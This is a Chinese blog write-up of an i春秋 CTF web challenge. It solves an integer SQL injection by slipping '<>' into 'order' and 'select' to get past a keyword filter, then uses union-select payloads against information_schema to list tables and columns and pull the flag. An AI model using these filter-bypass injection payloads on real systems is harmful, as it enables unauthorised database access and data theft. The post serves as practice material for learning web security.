i春秋web-SQL(基础绕过注入)

最新推荐文章于 2023-04-12 21:38:23 发布
最新推荐文章于 2023-04-12 21:38:23 发布
阅读量743 收藏 1
点赞数 1
分类专栏: i春秋 文章标签: i春秋 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/90405002
版权

很简单的一道注入,没有任何闭合,直接就是个整数的注入
id=1 order by 1

报错:inj code!

对order进行处理

1)id=1 or<>der by 1 报错:inj code!
2)id=1 ord<>er by 1 页面正常

id=-1 union sel<>ect 1,2,3
页面显示2,说明作用点在2的地方。

然后暴表

id=-1 union sel<>ect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

得到:info,users
根据源码提示,flag应该是在info中。

暴字段

id=-1 union sel<>ect 1,group_concat(column_name),3 from information_schema.columns where table_name=‘info’

得到:id,title,flAg_T5ZNdrm

暴出flag

id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

得到:flag{f2929a1b-1738-48ff-8609-2441ac9802cb}

大千SS
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入基础实战(i春秋
Jaychouzzk
08-17 3434
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
i春秋 WEB SQL
A_dmin的博客
06-20 849
i春秋 WEB SQL 一天一道CTF题目,能多不能少 打开网页,发现有个id参数,而且有提示: 查看网页源代码,发现有sql语句显示: 直接抓包,发现and,or,order好像被过滤了, 使用/**/,发现还是不行: 经过尝试发现,可以使用<>绕过关键字过滤 经过尝试,得到有三个字段: 使用union查询,发现select也被过滤掉了,同理使用<> 发现2的位置...
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入
AAAAAAAAAAAA66的博客
11-30 2544
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
i春秋之SQL注入-1
金 帛的博客
04-04 712
i春秋WP
i春秋之SQL(详细WP)
金 帛的博客
02-22 1521
i春秋webWP
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入 SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 ...
10-sql注入-mysql注入1
08-03
- 简单的SQL注入检测函数,如文中示例,通过替换或正则匹配关键字来防止注入,但可以被大小写变换、%00编码等方式绕过。 - 使用`AND 1=1`和`AND 1=2`来判断注入点的存在,通过改变条件的真假来观察响应变化。 - `...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
网络参数配置工具(U位模块管理搜索).rar
09-04
软件介绍: U位模块管理搜索工具Smarracksetting操作步骤:1、把设备接到网上,点击搜索设备按钮。2、在左边的列表中选择将要配置的设备;3、在上方的输入框内输入相关参数。4、点击设置按钮,提示保存成功。
i春秋:无处不在的SQL注入
MyBack
06-01 3685
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.ichunqiu实验工具:sqlmap注入工具 实验目的 本节课程通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 实验思路 手工检测判断注入点利用SQLMap注入数据库获取数据库信息防御
春秋云境:CVE-2022-32991(SQL注入
最新发布
m0_65712192的博客
04-12 1622
该CMS的welcome.php中存在SQL注入攻击。
i春秋 WEB 123
A_dmin的博客
06-14 971
i春秋 WEB 123 一天一道CTF题目,能多不能少 打开网页一个登录框,按照惯例查看网页源代码,有所发现: 查看user.php,发现存在但是什么都没有,检查是否存在备份文件~ 发现存在: 下载打开,bp抓包,当做字典进行爆破: 先构造: 最后加入字典进行爆破,年份不对可以一直加,或者减,,,,,总之,暴力就对了 最后得到用户名和密码: zhangyuzhen zhangyuzhen19...
Taocms SQL注入(CVE-2021-44915)复现--春秋云镜靶场
m7789的博客
11-24 992
Taocms 3.0.2版本存在SQL注入漏洞。该漏洞源于应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞通过功能编辑类别进行SQL注入
暑期练习web22:sqli (i春秋) sql盲注,逗号绕过
qq_41618162的博客
08-23 1094
这道题一打开就是个白板,开始还以为网不好还没加载出来。。。查看源码 看到了login.php这个路径,于是满怀欣喜的访问它 结果进去后什么都没得。。。以前也遇到过这种情况,所以拿bp抓一下包,也没发现东西 这下就一筹莫展了,于是参考了一下wp,才知道发生了302重定向,简单说就是从一个跳转到另一个页面,而且这个过程是我们刚进入题目连接就发生了的 这里一个是1 另一个是l,很容易混淆...
sql注入绕过技巧之打狗棒法
2ed
04-04 629
0x0001 首先针对 preg_replace 很多狗都是通过替换关键词来进行过滤: preg_replace(‘A’ , ‘B’ , C) :执行一个正则表达式的搜索和替换,这个的意思是搜索C中符合A的部分,然后用B来代替。 1.大小写绕过 有些替换的过程中没有考虑到数据库执行过程大小写转换的问题,只处理了小写或大写的关键字,例如:select和SELECT会被过滤,但seLeCt并不会被防...
【22】WEB安全学习----MySQL注入-7(绕过限制)
尚未佩妥剑 转眼便江湖
09-20 1477
注释符:-- 、#、/**/绕过 只能闭合后面的语句,使其成为正确的SQL语句。 $sql="SELECT username FROM users WHERE id='{$id}' limit 0,1;" $id=-1' union select version() '1; $sql="SELECT username FROM users WHERE id='-1' union selec...
i春秋CTF-WEB题解(二)
weixin_42271850的博客
07-08 1169
简述         还是和之前一样,每做三题写一个题解记录一下。 一、SQL         题目给的提示是:题目内容提示这是一道SQL注入的题目。打开网页查看源代码能看到有一些提示: <!--SELECT * FROM info WHERE id=1--><br />flag{在数据库中}<br />&
深入了解SQL注入绕过waf和过滤机制
02-11
深入理解SQL注入绕过Web应用防火墙(WAF)和过滤机制是一门关键的技能,尤其是在IT安全领域。WAF是一种网络安全系统,旨在检测并阻止恶意攻击,尤其是针对Web应用程序的攻击,如SQL注入。本文将带你探讨以下几个关键...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值